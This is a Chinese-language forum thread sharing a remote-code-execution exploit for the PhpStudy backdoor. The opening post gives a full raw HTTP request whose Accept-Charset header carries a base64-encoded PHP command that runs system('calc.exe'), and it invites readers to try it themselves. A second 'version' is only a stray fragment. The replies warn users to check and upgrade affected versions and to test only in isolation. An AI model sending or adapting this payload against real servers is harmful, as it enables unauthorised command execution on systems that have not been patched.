Phpstudy 后门RCE
一共2个版本,请自行尝试来自圈子社区核心群
版本一:
GET /1.php HTTP/1.1
Host: ihonker.org
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9
Accept-Encoding:gzip,deflate
Accept-Charset:这里就是要执行的命令base64加密 c3lzdGVtKCdjYWxjLmV4ZScpOw==
Cookie: UM_distinctid=16ae380e49f27e-0987ab403bca49-3c604504-1fa400-16ae380e4a011b; CNZZDATA3801251=cnzz_eid%3D1063495559-1558595034-%26ntime%3D1559102092; CNZZDATA1670348=cnzz_eid%3D213162126-1559207282-%26ntime%3D1559207282
Connection: close
版本二:
filetype 关键词
Re: Phpstudy 后门RCE
感谢分享这个漏洞信息。大家使用Phpstudy时务必提高警惕,建议立即检查自己使用的版本是否受影响,并及时升级到官方修复后的版本,避免被恶意利用。Re: Phpstudy 后门RCE
看到这个帖子,提醒一下大家:Phpstudy后门影响范围其实挺广的,如果还在用老版本的建议尽快检查更新或更换环境。楼主贴的版本一里 `Accept-Charset` 字段直接带 base64 编码的命令,这个手法比较典型。不过版本二的代码好像没贴全?方便麻烦补一下吗,方便更多人测试和防范。另外实际操作时请务必在隔离环境中进行,避免影响线上业务。Re: Phpstudy 后门RCE
看到这个漏洞通报,确实需要警惕。Phpstudy 作为常用的集成环境,如果存在后门影响面会很大。建议大家尽快检查自己使用的版本,如果有条件可以升级或更换环境组件,同时注意不要随意在可疑站点执行相关 payload。希望官方能尽早发布修复或说明。
页:
[1]